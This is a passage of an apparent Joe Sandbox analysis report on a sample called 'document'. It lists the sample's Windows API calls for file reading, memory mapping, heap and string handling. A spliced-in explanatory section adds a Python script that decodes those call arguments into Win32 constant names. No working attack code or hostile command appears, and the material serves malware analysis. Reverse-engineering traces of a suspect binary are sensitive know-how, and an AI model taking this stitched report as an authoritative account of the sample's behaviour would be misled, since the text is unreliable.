                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile$CloseHandleMapping
                                                                  • String ID:
                                                                  • API String ID: 2353530451-0
                                                                  • Opcode ID: 090e925647e629e1d9fdd77bcff8ee2c0cad40d50ae18b26d1d138ae1d50bb0b
                                                                  • Instruction ID: b1713de03d30712edf461a6f0e0af24326c7c5dfdbc2b318762e316791e25a2b
                                                                  • Opcode Fuzzy Hash: 090e925647e629e1d9fdd77bcff8ee2c0cad40d50ae18b26d1d138ae1d50bb0b
                                                                  • Instruction Fuzzy Hash: 7A21F4313892246AF230673ABC49FDB3B988B86730F511036F750E22E1DAB46806966D
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0041F84E
                                                                  • HeapFree.KERNEL32(00000000), ref: 0041F851
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0041F860
                                                                  • HeapFree.KERNEL32(00000000), ref: 0041F863
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0041F872
                                                                  • HeapFree.KERNEL32(00000000), ref: 0041F875
                                                                  • CloseHandle.KERNEL32(?), ref: 0041F884
                                                                  • CloseHandle.KERNEL32(?), ref: 0041F88D
                                                                  • CloseHandle.KERNEL32(?), ref: 0041F896
                                                                  • CloseHandle.KERNEL32(?), ref: 0041F89F
                                                                  • CloseHandle.KERNEL32(?), ref: 0041F8A8
                                                                  • SetEvent.KERNEL32(?), ref: 0041F8BB
                                                                  • Sleep.KERNEL32(000003E8), ref: 0041F8C6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseHandle$FreeProcess$EventSleep
                                                                  • String ID:
                                                                  • API String ID: 2749338665-0
                                                                  • Opcode ID: 9c1348228d7dc5c2962a96d715c005febc0d8f4a9507fb5608177c5e893bdc25
                                                                  • Instruction ID: 76c645c424173bd840e30338d02661637eb24344bf89ff37b7fb3177c525ef51
                                                                  • Opcode Fuzzy Hash: 9c1348228d7dc5c2962a96d715c005febc0d8f4a9507fb5608177c5e893bdc25
                                                                  • Instruction Fuzzy Hash: 2D11BA71300704ABE620ABBADC84FEBF3ECAF98751F05492AE559C7250CA74F8418A64
                                                                  APIs
                                                                  • LCMapStringW.KERNEL32(00000000,00000100,0042EB1C,00000001,00000000,00000000,0042EB20,00000038,0042B0F7,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 0042A04E
                                                                  • GetLastError.KERNEL32 ref: 0042A060
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,0042B335,?,00000000,00000000,0042EB20,00000038,0042B0F7,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 0042A0E7
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,0042B335,?,?,00000000), ref: 0042A168
                                                                  • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0042A182
                                                                  • LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 0042A1BD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: String$ByteCharMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1775797328-0
                                                                  • Opcode ID: 4aa49757b57a5304e3d7957d6244e3b008b81b7b30d59c19cfa7548b89e7cf8c
                                                                  • Instruction ID: 3988559e70c465a35b60d6fc3080959d3b10041c74b9751cd7113821b118c49c
                                                                  • Opcode Fuzzy Hash: 4aa49757b57a5304e3d7957d6244e3b008b81b7b30d59c19cfa7548b89e7cf8c
                                                                  • Instruction Fuzzy Hash: 5FB18472A00129EFCF219FA1EC849EE7B75FF08354F54412AFD11A2260D7398D61DB6A
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,00000001,00000001,00000000,00000003,00000000,00000000,74DF2EE0,00000001,00000000,004123D8,?,?,?), ref: 0041DF78
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041DF88
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041DF95
                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 0041DFAB
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041DFAE
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041DFBB
                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0041DFE0
                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0041E013
                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0041E024
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 0041E02F
                                                                  • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0041E032
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleHeap$File$Process$AllocCreateFreeReadSize
                                                                  • String ID:
                                                                  • API String ID: 851827180-0
                                                                  • Opcode ID: 60d014867e17b0a3a17904d24a01199ccef4cdd3278f6ba1154e53a9580f930a
                                                                  • Instruction ID: e2e57060ce1e7308e866bc93ed0c156a6316686fabef653f62ff15feab7bbeed
                                                                  • Opcode Fuzzy Hash: 60d014867e17b0a3a17904d24a01199ccef4cdd3278f6ba1154e53a9580f930a
                                                                  • Instruction Fuzzy Hash: 124191753052109FD7208F69EC85BB67BE8EB8A721F10143AF581C72A1D7B594478B2D
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?), ref: 0041AD0A
                                                                    • Part of subcall function 0041BC30: WaitForSingleObject.KERNEL32(?,?), ref: 0041BCA3
                                                                    • Part of subcall function 0041BC30: GetOverlappedResult.KERNEL32(000000FF,?,00000001,00000000), ref: 0041BCB8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectOverlappedResultSingleWaitlstrlen
                                                                  • String ID: #$&$($/$5$@$`$c$e$n
                                                                  • API String ID: 1203007601-276966957
                                                                  • Opcode ID: 243c376249be2b182f6dacd44d2a29b8c8a9c47cc2e434e317091e12bd14b117
                                                                  • Instruction ID: 40db77f959c89022b5c68d7f606fb1fae4f3f0c1390896a0b38eb06e05df56be
                                                                  • Opcode Fuzzy Hash: 243c376249be2b182f6dacd44d2a29b8c8a9c47cc2e434e317091e12bd14b117
                                                                  • Instruction Fuzzy Hash: 0A31A17210C3C18AD311DA28D80479BBBD59BD6318F044A6EF5D48B2D2D7B99658C3EB
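The API records on this page list raw hexadecimal stack slots, so reading them means translating values like 80000000, 00000003 and 00000002 back into GENERIC_READ, OPEN_EXISTING and PAGE_READONLY by hand. The decoder below is an added example for working through this report (it is not Joe Sandbox code and not code from the sample): it parses the plugin's "Api.MODULE(slot,...), ref: ADDR" lines, decodes the CreateFileA, CreateFileMappingA and MapViewOfFile arguments from the records above and from the record that follows, and checks whether a GetProcAddress record resolves exactly the user32 export set that the Microsoft Visual C runtime's own message-box helper (__crtMessageBoxA) loads, so that the LoadLibraryA/GetProcAddress record above can be recognised as CRT boilerplate rather than sample-specific API hiding. SAMPLE_LINES are copied from this page as constructed test input; the constant tables hold the documented Win32 values. Slots past an API's real parameter count are stack noise and are ignored, and a "?" slot is one the plugin could not resolve statically.

```python
"""Decode Joe Sandbox IDA-plugin API call lines into symbolic Win32 constants.

Added example for reading this report; it is neither Joe Sandbox code nor code
from the analysed sample. SAMPLE_LINES are copied from records on this page
(constructed test input); the tables hold documented Win32 values.
"""
import re

# Joe prints "Api.MODULE(slot,slot,...), ref: ADDR"; slots are raw stack values,
# so anything past the API's real parameter count is noise and '?' is unresolved.
LINE_RE = re.compile(r"(?P<api>\w+)\.\w+(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL",
                  0x1: "FILE_READ_DATA"}  # 0x1 is FILE_LIST_DIRECTORY when opening a directory
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x40000000: "FILE_FLAG_OVERLAPPED",
              0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
              0x02000000: "FILE_FLAG_BACKUP_SEMANTICS"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x1000000: "SEC_IMAGE"}
MAP_ACCESS = {0x1: "FILE_MAP_COPY", 0x2: "FILE_MAP_WRITE", 0x4: "FILE_MAP_READ", 0x20: "FILE_MAP_EXECUTE"}

# The user32 exports the Microsoft Visual C runtime's own message-box helper
# (__crtMessageBoxA) resolves via GetProcAddress: CRT boilerplate, not API hiding.
CRT_MESSAGEBOX_IMPORTS = {"MessageBoxA", "GetActiveWindow", "GetLastActivePopup",
                          "GetUserObjectInformationA", "GetProcessWindowStation"}

SAMPLE_LINES = r"""
• SetEvent.KERNEL32 ref: 004013B0
• LoadLibraryA.KERNEL32(user32.dll,0042E5E8,?,?), ref: 0042ADE9
• GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0042AE05
• GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0042AE16
• GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0042AE23
• GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 0042AE39
• GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0042AE4A
• CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,74DE8A60,00406532,?, :\,?,?,?), ref: 00406275
• CreateFileMappingA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00406292
• Sleep.KERNEL32(000003E8), ref: 0041F8C6
• CreateFileA.KERNEL32(00000000,00000001,00000001,00000000,00000003,00000000,00000000,74DF2EE0,00000001,00000000,004123D8,?,?,?), ref: 0041DF78
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,74DE8A60), ref: 00415717
"""

def parse_arg(raw):
    """Hex slot -> int, '?' -> None, anything else (a string literal) stays text."""
    raw = raw.strip()
    if raw in ("", "?"):
        return None
    try:
        return int(raw, 16)
    except ValueError:
        return raw

def decode_flags(value, table):
    """Expand a bitmask into known names; bits no entry explains are kept as hex."""
    if value is None:
        return ["?"]
    if isinstance(value, str):
        return [value]
    names = [name for bit, name in table.items() if (value & bit) == bit]
    rest = value
    for bit in table:
        rest &= ~bit
    if rest or not names:
        names.append(hex(rest))
    return names

def decode_call(line):
    """Return (api, ref, decoded arguments) for one report line, or None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    api, ref = m.group("api"), m.group("ref")
    a = [parse_arg(x) for x in (m.group("args") or "").split(",")] + [None] * 8
    if api in ("CreateFileA", "CreateFileW"):  # name, access, share, sa, disposition, flags, template
        info = {"access": decode_flags(a[1], GENERIC_ACCESS), "share": decode_flags(a[2], SHARE_MODE),
                "disposition": DISPOSITION.get(a[4], a[4]), "flags": decode_flags(a[5], FILE_FLAGS)}
    elif api in ("CreateFileMappingA", "CreateFileMappingW"):  # hFile, sa, flProtect, hi, lo, name
        info = {"protect": decode_flags(a[2], PAGE_PROTECT)}
    elif api == "MapViewOfFile":  # hMapping, access, offHi, offLo, bytes (0 = whole mapping)
        info = {"access": decode_flags(a[1], MAP_ACCESS), "bytes": a[4]}
    elif api == "GetProcAddress":
        info = {"name": a[1]}
    elif api == "Sleep":
        info = {"ms": a[0]}
    else:
        info = {"args": [x for x in a if x is not None]}
    return api, ref, info

def decode_report(text):
    """Decode every call line of a pasted report fragment, keyed by call-site address."""
    calls = (decode_call(line) for line in text.splitlines())
    return {ref: (api, info) for api, ref, info in (c for c in calls if c)}

def resolves_crt_messagebox_set(report):
    """True when the GetProcAddress targets cover the CRT helper's import set."""
    names = {info["name"] for api, info in report.values() if api == "GetProcAddress"}
    return CRT_MESSAGEBOX_IMPORTS <= names
```

Running decode_report(SAMPLE_LINES) shows the two file opens as GENERIC_READ / OPEN_EXISTING (one with FILE_SHARE_READ|FILE_SHARE_WRITE, one opened with FILE_READ_DATA and FILE_SHARE_READ), the mapping as PAGE_READONLY with a FILE_MAP_READ view of the whole file, and Sleep(000003E8) as 1000 ms, which is the evidence behind the "read a file into memory" behaviour the records describe. Values the plugin shows as 000000FF for the WaitForMultipleObjects and WaitForSingleObject timeouts above should be confirmed in the disassembly before being read as 255 ms: INFINITE is 0xFFFFFFFF, which the compiler emits as a one-byte sign-extended push.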
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000004,00000080,00000000,?), ref: 004156BD
                                                                  • CreateFileMappingA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 004156DE
                                                                  • CloseHandle.KERNEL32(00000000), ref: 004156EF
                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,74DE8A60), ref: 00415717
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041573C
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00415763
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseFileHandle$Create$MappingView
                                                                  • String ID:
                                                                  • API String ID: 3943831188-0
                                                                  • Opcode ID: 787c517364cca91a25c3f6c6ae074f02f0c4f93847fde26aceba2bb5773ca060
                                                                  • Instruction ID: eb472704c8537460521009dc0dce809b9dfd64f6dddd53decf9b69cebded8fb2
                                                                  • Opcode Fuzzy Hash: 787c517364cca91a25c3f6c6ae074f02f0c4f93847fde26aceba2bb5773ca060
                                                                  • Instruction Fuzzy Hash: 97513D352043909BD321EB3AEC927DBBBD5ABCA310F54543AE9C4973B2C6B69405CB1D
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(?,?,00000001), ref: 00414F58
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00414F96
                                                                  • CloseHandle.KERNEL32(?), ref: 00414FA6
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00414FB7
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00414FBA
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00414FD2
                                                                  • HeapFree.KERNEL32(00000000), ref: 00414FDB
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00414FE4
                                                                  • HeapFree.KERNEL32(00000000), ref: 00414FE7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseHandle$FreeObjectProcessSingleWait
                                                                  • String ID:
                                                                  • API String ID: 2579758194-0
                                                                  • Opcode ID: 5cb114ee75c73d9d28095b093425758b0f491e95b005c264dc94f0b4429a9c47
                                                                  • Instruction ID: 966a43781993c991ec9a06a83fdc448c25b6a2ab2b61fe85e3c188c58705bdba
                                                                  • Opcode Fuzzy Hash: 5cb114ee75c73d9d28095b093425758b0f491e95b005c264dc94f0b4429a9c47
                                                                  • Instruction Fuzzy Hash: EB21A2351083809BC225EB69DC41BABBBE8AFD9714F44161EE5A8433D1CB746805CB2B
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,00000000), ref: 0040B13C
                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0040B167
                                                                  • ReadFile.KERNEL32(00000000,?,00000020,?,00000000), ref: 0040B183
                                                                  • ReadFile.KERNEL32(00000000,?,00000004,00000020,00000000), ref: 0040B1A8
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000004,00000020,00000000), ref: 0040B1C7
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040B2DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$Read$CloseCreateHandlePointer
                                                                  • String ID:
                                                                  • API String ID: 3856724686-3916222277
                                                                  • Opcode ID: 5bc78143f89a4dea2e96d905125e01f41ef2d97ae2f535c0578264ef0fb96339
                                                                  • Instruction ID: f9615a2b2c25ec5e1afef60f4e7c90419b410b37da83d95b541e47871ec683b4
                                                                  • Opcode Fuzzy Hash: 5bc78143f89a4dea2e96d905125e01f41ef2d97ae2f535c0578264ef0fb96339
                                                                  • Instruction Fuzzy Hash: 1651B271E00218EBDB24DBA5DD85BAEB7B8FF44710F10052EE502B72D1D778A941CBA9
                                                                  APIs
                                                                  • GetCPInfo.KERNEL32(00000000,?,0042F660,00000038,0042B6ED,?,00000000,00000000,0042B335,00000000,00000000,0042EFF0,0000001C,0042B0D3,00000001,00000020), ref: 0042C933
                                                                  • GetCPInfo.KERNEL32(00000000,00000001), ref: 0042C946
                                                                  • _strlen.LIBCMT ref: 0042C96A
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,0042B335,?,00000000,00000000), ref: 0042C98B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Info$ByteCharMultiWide_strlen
                                                                  • String ID:
                                                                  • API String ID: 1335377746-0
                                                                  • Opcode ID: e7eae73510b1a6f52b71c388bc37a5b4cf69bb84f4117bde77e4d4d51f61c10f
                                                                  • Instruction ID: 1cbf8f742c718ae3e0944b330c4ad140625f126a7c77b4e5641174acd2f5a51b
                                                                  • Opcode Fuzzy Hash: e7eae73510b1a6f52b71c388bc37a5b4cf69bb84f4117bde77e4d4d51f61c10f
                                                                  • Instruction Fuzzy Hash: 36517F70A01229ABCB20DF96ED85AAF7BB9EF44750FA4011BF415A2250D7354941CB68
                                                                  APIs
                                                                  • GetEnvironmentStringsW.KERNEL32(74DF0A60,00000000,?,?,?,?,00425EA6,?,0042E598,00000060), ref: 0042AA45
                                                                  • GetLastError.KERNEL32(?,?,?,?,00425EA6,?,0042E598,00000060), ref: 0042AA59
